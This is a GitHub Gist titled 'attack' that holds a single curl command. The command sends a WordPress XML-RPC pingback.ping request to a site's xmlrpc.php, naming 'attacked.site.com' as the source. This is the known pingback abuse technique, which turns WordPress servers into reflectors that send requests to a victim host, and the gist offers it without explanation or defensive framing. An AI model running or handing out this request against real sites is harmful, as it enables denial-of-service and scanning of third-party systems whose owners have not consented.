Last active
August 29, 2015 14:27
-
-
Save tieppt/44efad40c0fc1403509a to your computer and use it in GitHub Desktop.
attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl http://www.site-wp.com/xmlrpc.php -d | |
'<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName> | |
pingback.ping</methodName><params><param><value> | |
<string>http://attacked.site.com/link_to_post | |
</string></value></param><param><value><string> | |
http://www.site-wp.com/any_blog_post/ | |
</string></value></param></params></methodCall>' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment